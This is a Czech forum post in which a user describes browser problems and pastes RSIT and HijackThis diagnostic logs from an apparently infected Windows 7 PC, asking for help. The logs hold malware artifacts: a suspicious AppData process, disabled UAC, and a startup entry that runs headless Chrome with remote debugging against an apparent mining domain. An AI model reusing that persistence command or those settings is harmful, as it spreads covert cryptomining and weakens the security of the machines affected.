Prosím o kontrolu logu
Napsal: 10 pro 2022 11:56
V prohlížeči se mi otevírají zdvojená nebo ztrojená okna, zdá se mi, že myš špatně reaguje na klik, nejde mi spustit Gmail /náhodná chyba/ už týden, ale nevím, jestli to spolu souvisí. Předem děkuji
Logfile of random's system information tool 1.10 (written by random/random)
Run by KAREL at 2022-12-10 11:47:04
Microsoft Windows 7 Professional Service Pack 1
System drive C: has 2 GB (2%) free of 71 GB
Total RAM: 3001 MB (50% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:47:12, on 10.12.2022
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal
Running processes:
C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.exe
C:\Program Files\trend micro\KAREL.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.seznam.cz/?sourceid=quick ... earchTerms}
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.seznam.cz/?clid=22668
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = https://www.seznam.cz/?clid=22668
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.seznam.cz/?sourceid=quick ... earchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.seznam.cz/?clid=22668
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe,
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O17 - HKLM\System\CCS\Services\Tcpip\..\{E28415F2-DD36-4578-8DA7-537087953C9F}: NameServer = 8.8.8.8,8.8.4.4
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: CCleaner Performance Optimizer Service (CCleanerPerformanceOptimizerService) - Piriform Software Ltd - C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: GalaxyClientService - GOG.com - C:\Program Files (x86)\GOG Galaxy\GalaxyClientService.exe
O23 - Service: GalaxyCommunication - GOG.com - C:\ProgramData\GOG.com\Galaxy\redists\GalaxyCommunication.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
--
End of file - 4917 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"taskhost.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\Explorer.EXE
"C:\Windows\system32\WUDFHost.exe" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:HostProcess-e36a71db-9446-4554-92cf-f498d1e26b25 -SystemEventPortName:HostProcess-ed3a6956-62ea-4764-9efd-e1c997c33efa -IoCancelEventPortName:HostProcess-5da6228f-2b83-4359-afc7-eacc8c657cae -NonStateChangingEventPortName:HostProcess-32cfba49-d141-43ce-95b8-76e5cd36f1ba -ServiceSID:S-1-5-80-2652678385-582572993-1835434367-1344795993-749280709 -LifetimeId:2151ac0a-6ea4-422e-b86d-fc265ef8c2c7
C:\Windows\System32\svchost.exe -k secsvcs
"C:\Windows\System32\igfxtray.exe"
"C:\Windows\System32\hkcmd.exe"
"C:\Windows\System32\igfxpers.exe"
C:\Windows\system32\SearchIndexer.exe /Embedding
taskeng.exe {C2BEE4A9-7C0E-4A21-89AB-5F13323D3D07}
C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.exe "C:\Users\KAREL\AppData\Roaming\ckgkr\corsve.dat"
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
"C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe"
"C:\Program Files\Mozilla Firefox\firefox.exe"
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.0.1514780633\481822948" -parentBuildID 20221128144904 -prefsHandle 1064 -prefMapHandle 1056 -prefsLen 28571 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {17c73143-1239-4fce-a305-d5e3aa6e13b8} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1148 11922958 gpu
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.1.1404449285\345913368" -parentBuildID 20221128144904 -prefsHandle 1280 -prefMapHandle 1276 -prefsLen 28616 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {877eb6b6-6d77-4307-8ed5-5c56014f85a8} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1304 1245d258 socket
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.2.1041317365\1209599669" -childID 1 -isForBrowser -prefsHandle 1920 -prefMapHandle 1560 -prefsLen 28808 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff2761a-adeb-41d4-a015-b7675b662bca} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 1568 19d34558 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.3.1532327201\57405661" -childID 2 -isForBrowser -prefsHandle 2840 -prefMapHandle 2836 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c85a9c6f-5989-46a6-9fdc-f3cba4bd423a} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 2852 1ee07558 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.11.1303864253\24904238" -parentBuildID 20221128144904 -prefsHandle 1420 -prefMapHandle 4568 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {334568d4-802a-4f9c-b0f0-fad533005a19} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 3868 206b1e58 rdd
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.12.318543571\1127553368" -parentBuildID 20221128144904 -sandboxingKind 1 -prefsHandle 3784 -prefMapHandle 3932 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6278df4-9c11-4d4a-b303-99fc01afd70b} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 4776 21afde58 utility
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.13.1906558241\1088851588" -parentBuildID 20221128144904 -sandboxingKind 0 -prefsHandle 8416 -prefMapHandle 8420 -prefsLen 34286 -prefMapSize 234015 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de9cca4d-ba5e-4613-ad2f-28084671f2c3} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8404 1fc21f58 utility
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.40.2008587875\609523111" -childID 36 -isForBrowser -prefsHandle 4736 -prefMapHandle 3644 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18b5b08b-7ccb-4f9d-9c86-1ecc5eb5f977} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8084 17aaec58 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.41.904343850\998306174" -childID 37 -isForBrowser -prefsHandle 4364 -prefMapHandle 8512 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c49184c3-f335-436f-8e0c-8cff881394f6} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 4712 23ca2358 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.42.660471742\676350570" -childID 38 -isForBrowser -prefsHandle 3760 -prefMapHandle 3936 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {927e2b24-3551-4dd0-898e-6965ec2cdb4d} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 7972 23e5c358 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.43.1977308442\1865528447" -childID 39 -isForBrowser -prefsHandle 4108 -prefMapHandle 4792 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1dce0173-9b9a-405b-945f-9b3cb505b20c} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 8552 23a31b58 tab
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2968.44.1872515337\741879704" -childID 40 -isForBrowser -prefsHandle 7836 -prefMapHandle 7840 -prefsLen 34286 -prefMapSize 234015 -jsInitHandle 872 -jsInitLen 246704 -a11yResourceId 64 -parentBuildID 20221128144904 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c29eeab5-dfe2-4f9b-8e31-8d892eef0cdb} 2968 "\\.\pipe\gecko-crash-server-pipe.2968" 7856 24612058 tab
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Windows\system32\SearchFilterHost.exe" 0 508 512 520 65536 516
"C:\Users\KAREL\Downloads\RSITx64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
======Scheduled tasks folder======
C:\Windows\tasks\CCleanerCrashReporting.job - C:\Program Files\CCleaner\CCleanerBugReport.exe --product 90 --send dumps|report --path "C:\Program Files\CCleaner\LOG" --programpath "C:\Program Files\CCleaner" --configpath "C:\Program Files\CCleaner\Setup" --guid "515fbcf1-c488-4adb-87c8-d426745eb0a5" --version "6.06.10144" --silent
=========Mozilla firefox=========
ProfilePath - C:\Users\KAREL\AppData\Roaming\Mozilla\Firefox\Profiles\jzmbh3ho.default-release
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.11]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
======Registry dump======
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"=C:\Windows\system32\igfxtray.exe [2021-05-29 163384]
"HotKeysCmds"=C:\Windows\system32\hkcmd.exe [2021-05-29 387640]
"Persistence"=C:\Windows\system32\igfxpers.exe [2021-05-29 418360]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AlcoholAutomount]
C:\Program Files (x86)\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe -automount []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CCleaner Monitoring]
C:\Program Files\CCleaner\CCleaner64.exe [2022-11-09 38650192]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CCleaner Smart Cleaning]
C:\Program Files\CCleaner\CCleaner64.exe [2022-11-09 38650192]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\chrome]
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://mi-ner-nis-de-6.info/cdn-1006.html?t=0.4 []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Launch LCore]
C:\Program Files\Logitech Gaming Software\LCore.exe /minimized []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\launchOnStartup]
C:\Program Files (x86)\GOG Galaxy\GalaxyClient.exe [2020-06-13 13971528]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\M-Audio Taskbar Icon]
C:\Windows\system32\M-AudioTaskBarIcon.exe [2010-03-31 798728]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Path]
C:\Program Files (x86)\ZOOM\Edit_Share\bin\ZOOM Edit&Share startup.exe []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PWRISOVM.EXE]
C:\Program Files\PowerISO\PWRISOVM.EXE [2018-06-17 456160]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RTHDVCPL]
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Host Services x64.lnk]
C:\PROGRA~1\qemu\HOSTSE~1.EXE []
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^KAREL^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^SmartClock.lnk]
C:\Users\KAREL\AppData\Roaming\SMARTC~1\SMARTC~1.EXE []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\igfxcui]
C:\Windows\system32\igfxdev.dll [2021-05-29 272384]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=0
"ConsentPromptBehaviorUser"=3
"EnableLUA"=0
"EnableUIADesktopToggle"=0
"PromptOnSecureDesktop"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"VIDC.UYVY"=msyuv.dll
"VIDC.YUY2"=msyuv.dll
"VIDC.YVYU"=msyuv.dll
"VIDC.IYUV"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"VIDC.YVU9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"MSVideo8"=VfWWDM32.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave4"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer4"=wdmaud.drv
"aux2"=wdmaud.drv
"wave5"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer5"=wdmaud.drv
"aux3"=wdmaud.drv
"wave6"=wdmaud.drv
"mixer6"=wdmaud.drv
"wave7"=wdmaud.drv
"mixer7"=wdmaud.drv
"midi8"=wdmaud.drv
"aux4"=wdmaud.drv
"midi6"=wdmaud.drv
"midi7"=wdmaud.drv
"wave8"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer8"=wdmaud.drv
"wave9"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer9"=wdmaud.drv
"midi9"=wdmaud.drv
"aux5"=wdmaud.drv
"aux6"=wdmaud.drv
"aux7"=wdmaud.drv
"aux8"=wdmaud.drv
"aux9"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
======List of files/folders created in the last 1 month======
2022-12-10 11:47:04 ----D---- C:\rsit
2022-12-10 07:18:46 ----D---- C:\ProgramData\Piriform
2022-12-01 19:27:16 ----D---- C:\Program Files\Mozilla Firefox
======List of files/folders modified in the last 1 month======
2022-12-10 11:47:12 ----D---- C:\Windows\Temp
2022-12-10 11:47:11 ----D---- C:\Program Files\trend micro
2022-12-10 11:47:08 ----D---- C:\Windows\Prefetch
2022-12-10 11:37:06 ----D---- C:\Windows\system32\drivers\etc
2022-12-10 11:32:55 ----D---- C:\Program Files\CCleaner
2022-12-10 11:07:16 ----D---- C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
2022-12-10 07:18:46 ----HD---- C:\ProgramData
2022-12-10 06:59:46 ----D---- C:\Windows
2022-12-10 06:58:13 ----D---- C:\Windows\system32\Tasks
2022-12-10 06:58:11 ----D---- C:\Windows\Tasks
2022-12-08 15:46:26 ----D---- C:\Windows\system32\config
2022-12-08 15:42:50 ----SHD---- C:\System Volume Information
2022-12-03 15:15:04 ----D---- C:\Users\KAREL\AppData\Roaming\AIMP
2022-12-03 14:49:10 ----D---- C:\Windows\System32
2022-12-03 14:49:10 ----A---- C:\Windows\system32\PerfStringBackup.INI
2022-12-03 14:49:09 ----D---- C:\Windows\inf
2022-12-03 14:45:20 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2022-12-02 15:52:05 ----D---- C:\Program Files
2022-11-26 10:13:03 ----D---- C:\Windows\SoftwareDistribution
2022-11-20 16:13:21 ----A---- C:\Windows\system32\msvcsv60.dll
2022-11-20 16:13:21 ----A---- C:\Users\KAREL\AppData\Roaming\msregsvv.dll
2022-11-20 10:41:08 ----D---- C:\Users\KAREL\AppData\Roaming\Tracktion
2022-11-19 05:27:17 ----D---- C:\Windows\system32\catroot2
2022-11-12 19:25:01 ----D---- C:\Users\KAREL\AppData\Roaming\vlc
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2010-11-21 213888]
R0 sptd;sptd; C:\Windows\System32\Drivers\sptd.sys [2020-10-10 393880]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2010-11-21 514560]
R1 SCDEmu;SCDEmu; C:\Windows\system32\drivers\SCDEmu.sys [2017-06-07 138296]
R1 vwififlt;Virtual WiFi Filter Driver; C:\Windows\system32\DRIVERS\vwififlt.sys [2009-07-14 59904]
R2 MBAMChameleon;MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [2022-10-16 220752]
R3 AgereSoftModem;Agere Systems Soft Modem; C:\Windows\system32\DRIVERS\agrsm64.sys [2009-06-10 1146880]
R3 athr;Atheros Extensible Wireless LAN device driver; C:\Windows\system32\DRIVERS\athrx.sys [2011-10-20 2770944]
R3 BEHRINGER_2902;usb-audio.de driver for BEHRINGER USB AUDIO; C:\Windows\System32\Drivers\BUSB2902.sys [2009-10-30 460864]
R3 BUSB_AUDIO_WDM;BEHRINGER USB WDM AUDIO; C:\Windows\system32\drivers\busbwdm.sys [2009-10-30 49728]
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\Windows\system32\DRIVERS\GEARAspiWDM.sys [2019-12-12 33240]
R3 igfx;igfx; C:\Windows\system32\DRIVERS\igdkmd64.sys [2021-05-29 10629408]
R3 NIWinCDEmu;ISO Mounter driver; C:\Windows\system32\DRIVERS\NIWinCDEmu.sys [2015-08-24 112408]
R3 vwifimp;Microsoft Virtual WiFi Miniport Service; C:\Windows\system32\DRIVERS\vwifimp.sys [2009-07-14 17920]
R3 WmBEnum;Logitech Virtual Bus Enumerator Driver; C:\Windows\system32\drivers\WmBEnum.sys [2010-04-27 26440]
R3 WmXlCore;Logitech Translation Layer Driver; C:\Windows\system32\drivers\WmXlCore.sys [2010-04-27 77512]
S0 Partizan;Partizan; C:\Windows\system32\drivers\Partizan.sys []
S3 aswTap;avast! SecureLine TAP Adapter v3; C:\Windows\system32\DRIVERS\aswTap.sys [2018-09-05 53904]
S3 BazisVirtualCDBus;WinCDEmu Virtual Bus Driver; C:\Windows\system32\DRIVERS\BazisVirtualCDBus.sys [2015-09-28 172376]
S3 cpuz148;cpuz148; \??\C:\Windows\temp\cpuz148\cpuz148_x64.sys []
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 dtlitescsibus;DAEMON Tools Lite Virtual SCSI Bus; C:\Windows\system32\DRIVERS\dtlitescsibus.sys [2016-12-29 30264]
S3 dtliteusbbus;DAEMON Tools Lite Virtual USB Bus; C:\Windows\system32\DRIVERS\dtliteusbbus.sys [2016-12-29 47672]
S3 fiddrv64;fiddrv64; C:\Windows\system32\drivers\fiddrv64.sys []
S3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\Windows\system32\drivers\RTKVHD64.sys []
S3 LGBusEnum;Logitech Gaming Virtual Bus Enumerator Driver; C:\Windows\system32\drivers\LGBusEnum.sys [2018-05-07 36496]
S3 LGJoyXlCore;Logitech Translation Layer Driver (LGS); C:\Windows\system32\drivers\LGJoyXlCore.sys [2018-05-07 67736]
S3 LGVirHid;Logitech Gamepanel Virtual HID Device Driver; C:\Windows\system32\drivers\LGVirHid.sys [2018-05-07 26008]
S3 MADFUOZONE;Service for M-Audio Ozone DFU; C:\Windows\system32\DRIVERS\MAudioOzone_DFU.sys [2010-03-31 46088]
S3 MAUSBOZONE;Service for M-Audio Ozone; C:\Windows\system32\DRIVERS\MAudioOzone.sys [2010-03-31 187912]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 pgusbmme;usb-audio.de MME-Adapter; C:\Windows\system32\drivers\pgusbmm3.sys [2010-08-13 49728]
S3 pgusbwdm;usb-audio.de driver (commercial 2.8.45); C:\Windows\System32\Drivers\pgusbwdm.sys [2010-08-13 466496]
S3 piddrv64;piddrv64; \??\C:\Windows\piddrv64.sys [2019-11-30 37256]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2010-11-21 165888]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 SWDUMon;SWDUMon; C:\Windows\system32\DRIVERS\SWDUMon.sys [2018-08-11 25608]
S3 tapwindscribe0901;Windscribe VPN; C:\Windows\system32\DRIVERS\tapwindscribe0901.sys [2018-02-01 45560]
S3 tapwp01;TAP-Windows Adapter V9 (WiFi Protector); C:\Windows\system32\DRIVERS\tapwp01.sys [2014-12-11 40664]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2010-11-21 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2010-11-21 31232]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
S3 WmFilter;Logitech Gaming HID Filter Driver; C:\Windows\system32\drivers\WmFilter.sys [2010-04-27 43976]
S3 WmVirHid;Logitech Virtual Hid Device Driver; C:\Windows\system32\drivers\WmVirHid.sys [2010-04-27 16200]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
